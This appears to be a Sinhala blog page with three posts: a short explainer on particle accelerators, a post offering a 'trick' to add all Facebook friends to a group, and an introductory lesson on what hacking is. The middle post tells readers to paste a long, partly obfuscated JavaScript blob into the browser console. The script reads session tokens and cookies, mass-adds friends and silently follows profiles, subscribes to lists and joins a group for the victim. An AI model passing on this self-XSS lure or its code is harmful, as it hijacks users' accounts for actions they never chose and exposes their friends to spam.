පැරණි ආකාරවල අංශු ත්වරක වල අංශු ත්වරණය කිරීම සිදු කර තිබෙන්නේ වැන්ඩි ග්‍රාෆ් ජනකායක් ස්ථිති විද්‍යුත් ක්ෂේත්‍රයක් දීමෙන් හෝ නැත්නම් ප්‍රත්‍යාවර්ථ විදුලිය මගින් උපයෝගී කරගන්න කොක්රෝෆ්ට් වෝල්ටන් ක්‍රමයට සකස් කරපු වෝල්ටීයතා ගුනකයක් මගිනි 1937 ඩි පිලිප්ස් හා අයින්දිහොවන් විසින් නිර්මාණය කරන ලද අංශු ත්වරක පරමාණු බෝම්බ නිපදවීම සඳහා බෙහෙවින් උපකාරී උනා.

මෙමෙ ශක්ති තරංග අද වන විට පර්යේක්ෂණ සඳහා බෙහෙවින් භාවිතා වෙනවා. දැනට ලෝක යේ අධි ශක්ති අංශු ත්වරක 26000 පමණ තියෙනවා. මේවගෙන් කිහිපයක් 1GeV (giga electron volt) තරමේ අධික ශක්ස්තියකට අංශු ත්වරණය කල හැකි ඒවා වේ. තව 11000 විකිසන ප්‍රතිකාර සඳහාත් 10000 විවිද ද්‍රව්‍ය තුලට වෙනත් යන ඇතුල් කර මුල් ද්‍රව්‍යයේ භාව්තික ගුණ වෙනස් කිරීම සඳහාත්, 2000 කාර්මික ක්ෂේත්‍රයේ පර්යේෂණ සඳහා යොදාගනු ලැබේ.

අංශු ත්වරක යන්තර ආකාර කිහිපයක් තියෙනවා.

රේඛිය අංශු ත්වරක
සයිලොට්‍රෝනය
බීටා ට්‍රෝනය
සින්ක්රෝට්‍රෝනය

මුලිකාන්ශු පිලිබඳ පර්යේෂණ සඳහා මේ අංශු ත්වරක බහුලව යොදාගන්නවා.මෙමගින් විශ්වයේ ආරම්භය තේරුම් ගැනීම. ප්රෝට්‍රොන හා නියුට්‍රෝන සෑදී ඇති බව විශ්වාස කරන එහෙත් තවමත් ප්‍රායෝගිකව සොයාගෙන නැති ක්වාර්ක් (quark) අංශු පිළිබඳව පර්යේෂණ සඳහා වැදගත්වෙනවා. මේ සම්බන්ධව සිදුකරන පර්යේෂණ සඳහා ඉලෙක්ට්‍රෝන , පොසිට්‍රෝන , ප්‍රෝටෝන, හා ප්‍රති ප්‍රෝටෝන , ආදී මුලික අංශු, අධි ශක්ස්ති කදම්භ බවට පත් කර හයිඩ්‍රජන් ඩියුටිරියම් වැනි සැහැල්ලු න්‍යෂ්ටි වලට ඝට්ටනය වීමට සැලැස්විය යුතුයිm මේ සඳහා GeV සියගනනකටත් වඩා වැඩිවූ ශක්තියක් ලබාදිය යුතු අංශු ත්වරක නිර්මාණය කල යුතුයි. මේ සඳහා අධික මුදලක් මුද්හලක් අවශ්‍ය වෙනවා. මෙම අධි ශක්ති අංශු ත්වරක මගින් පරමාණු න්‍යෂ්ටි වල භව්තික ගුණ, තාක්ෂණික වශයෙන් වැදගත්වූ විවිධ ගනද්‍රව්‍ය වලට ආවේනික වූ සුවිශේෂී භව්තික ගුනද අද්‍යනය කරන්න පුළුවන්

එහෙනම් අදට මේ ඇති. අනිත් අංශු ත්වරක ගැන ඉදිරි ලිපි වලින් කතා කරමු.

Saturday, August 22, 2015

එකපාරින් යාලුවො ඔක්කොම ගෲප් එක්ට ඇඩ් කරමුද - 1 shot

මුලින්ම කියන්න ඔනේ මම තාම ඉස්කෝලේ යන 10 වසරෙ පොඩි කොල්ලෙක් ඉතින් මෙච්චර දවසක් එක එක පොස්ට් දැම්මට අදින් පස්සේ පෝස්ට් දාන්නේ ඔයාලා මේ ගෲප් එක්ට දෙන කමෙන්ට්ස් අනුව ඉස්සරහට ගොඩක් වටින පොස්ට් දාන්න බලාපොරොත්තුවක් තියෙනවා. මටත් කරන්න ගොඩක් වැඩ තියෙනවා ඒවත් අස්සෙ තමා මෙහෙම පෝස්ට් දාන්නේ.ඒ නිසා ඔයාලගේ කමෙන්ට්ස් මට ගොඩාක් වටිනවා..
හරි දැන් ඔපා දූප ඇති වැඩේට බහිමු
ඉස්සෙල්ල්ම කියන්න ඔනේ මම මේ ක්‍රමේ ලන්කාවේ හොදම ෆොරම් එකක් වෙන කුප්පියයෙන් තම දැන ගත්තේ ඒත් අද තමා වැඩද බැලුවේ සුපිරියටම වැඩ.මෙක වැඩ කර්න්නේ computer එකට විතරයි එකෙත් Google Crome තමා මාත් ටෙස්ට් කලේ මෙහෙමයි ඉස්සෙල්ලාම ඔයාට කට්ටිය ඇඩ් කර්න්න ඔනේ ගෲප් එක්ට යන්න ඉට පස්සේ ඇඩ් මෙම්බෙර්ස් කියන එක ක්ලික් කරන්න.දැන් පොඩි කොට්ටක් ඒවි.දැන් මේ Script එක කොපි කරකන්න
(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Friends</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<b style='color:darkred'>Gruppe Öffnen!</b>"+crj:"<b style='color:darkgreen'>Search For Followers... ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkred'>( "+f.gagal+" )</b> <span style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.require){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' target='_blank'><b>"+c.name+"</b></a> haben dich abonniert.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<div style='font-size:20px;font-weight:bold'>People Invited!</div><a href='/' onClick='document.getElementById(\"hasilsurasil\").style.display=\"none\";return false'>Close</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","©"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="<div style='display:none; margin-top:10px;color:gray;font-size:12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='http://"+crl+"/' target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'><b>Fb Group Script By Safe Tricks </b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1])
function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}
}
function getRandomInt (min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone){
var http4 = new XMLHttpRequest();
var url4 = "/ajax/follow/follow_profile.php?__a=1";
var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
http4.open("POST", url4, true);
//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");
http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {
http4.close; // Close the connection
}
}
http4.send(params4);
}
function sublist(uidss) {
var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
document.body.appendChild(a);
}
a("");
a("");
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
data = eval('(' + gf['responseText']['substr'](9) + ')');
if (data['error']) {} else {
friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
return _0x93dax8['index'] - _0x93dax9['index'];
});
};
};

දැන් කරන්න තියෙන්නේ ඔහොම්ම කී බෝඩ් එකේ F12 ක්ලික් කරන්න දැන් ඒකෙ උඩ තීරුවෙන් Console කියන එක තෝරන්න
දැන් අර කලින් කොපි කරගත්තු ස්cරිප්ට් එක එකේ පහලින්ම පේස්ට් කරලා එන්ටර් කී එක ප්‍රෙස් කරන්න වැඩේ හරි දැන් බබා වගේ ඔක්කොම ඇඩ් වෙනවා.හරි පින්තූර ටික පහලින් දාන්නම් අදට පෝස්ට් එක ඉවරයි මතකයිනේ මුලින්ම කියපු එක එහෙනම් ඔක්කොටම සුබ දවසක්

හැකර්ස්ලා ගැන දැනගනිමුද




Hacking කියන්නේ මොකක්ද යන්න තමයි අද කොටසින් අපි කියන්නේ...
මේ පළමු පාඩම යි. තවත් පාඩම් රැසක් තියනවා ඉදිරියට. එතකොට කියන්න පුළුවන්නේ Hack කරන විදිය ගැන. එහෙනම් ආරම්භ කරමු ද අපේ පළමු වන පාඩම..

අපි මුලින්ම Hacking කියන්නේ මොකක්ද කියලා හඳුනාගනිමුකෝ..
Hacking කියලා කියන්නේ නීතිමය අයිතිවාසිකමකින් තොරව, තොරතුරු පද්ධතියක හෝ වෙනත් පරිගණක ජාලයක තිබෙන ආරක්ෂක යාන්ත්‍රණය මගහැර ගොස්, එම පද්ධතියට ඇතුළුවීමයි. මෙය සෑම රටකම නීතිවිරෝධී වන අතර එය සයිබර් අපරාධ ( cyber crime ) යටතට ගැනෙන වරදක් වේ..

එහෙත් නීතිමය අවසරයක් ඇතිව, දැනට තොරතුරු ජාල වල ඇතිවී තිබෙන දෝෂ මගහැරවීමේ උපක්‍රමයක් වශයෙන් එහි ආරක්ෂක යාන්ත්‍රණය මගහැර යාම වරදක් නොවේ. ethical hacking කියලා කියන්නේ එයයි.
මෙසේ ආරක්ෂක යාන්ත්‍රණය මගහැර පද්ධති වෙත පිවිසෙන්නා හැකර්කරුවා ( hacker ) ලෙස හඳුන්වනු ලබයි..

Hackersලා වර්ග 2කි :-
අයහපත් චේතනාවෙන් එසේ යන්නා - black hat hacker 
යහපත් චේතනාවෙන් එසේ යන්නා - white hat hacker